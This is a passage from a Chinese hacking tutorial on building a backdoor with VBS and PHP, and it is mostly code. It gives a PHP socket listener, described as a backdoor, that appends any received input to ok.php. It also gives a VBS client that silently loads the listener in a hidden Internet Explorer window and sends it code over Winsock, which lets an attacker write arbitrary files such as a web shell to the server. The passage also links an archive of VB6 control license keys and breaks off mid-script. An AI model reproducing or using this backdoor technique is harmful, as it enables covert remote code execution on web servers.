三、调用外部组件来运行vbs
vbs本身功能毕竟有限,但是却可以很好的与外部交互。要是用vbs来模拟nc发包的话,就要调用vb组件了。关于VBS如何成功调用MSWinsock.Winsock,zzzevazzz说的很清楚了。就是下载Winsock.ocs注册,和VB6控件的授权密钥的.reg导入注册表。两个文件可以在http://zzzevazzz.bokee.com/inc/vb6controls.rar这里下载。前不久学了一段时间php,网上看到一个php的监听程序,可以用它来做一个后门,s端s.php代码如下:
★
<?
// 设置一些基本的变量
$host = "192.168.8.100";
$port = 12345;
// 设置超时时间
set_time_limit(0);
// 创建一个Socket
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create
socketn");
//绑定Socket到端口
$result = socket_bind($socket, $host, $port) or die("Could not bind to
socketn");
// 开始监听链接
$result = socket_listen($socket, 3) or die("Could not set up socket
listenern");
// accept incoming connections
// 另一个Socket来处理通信
$spawn = socket_accept($socket) or die("Could not accept incoming
connectionn");
// 获得客户端的输入
$input = socket_read($spawn, 1024) or die("Could not read inputn");
// 清空输入字符串
$input = trim($input);//将输入结果写入ok.php,这句是我加的
fputs(fopen('ok.php','a+'),"$input");
//处理客户端输入并返回结果
$output = strrev($input) . "n";
socket_write($spawn, $output, strlen ($output)) or die("Could not write
outputn");
// 关闭sockets
socket_close($spawn);
socket_close($socket);
?>
★
在ie打开这个php,运行它的服务器会监听12345端口。如果我们再用vbs向12345端口发包的话,在同文件的php目录下会生成ok.php。发包的内容就是我们要写入ok.php的代码。该vbs文件c.vbs代码如下:
★
Set ie=WScript.CreateObject("InternetExplorer.Application")
ie.visible=false
ie.Navigate "http://192.168.8.100/s.php" 's.php是服务端
While ie.Busy
WScript.Sleep 100
Wend
Do
Wscript.Sleep 200
Loop Until ie.ReadyState=4
Set socket=WScript.CreateObject("MSWinsock.Winsock")
socket.Protocol=0
socket.RemotePort="12345" '端口
socket.RemoteHost="192.168.8.100" '主机
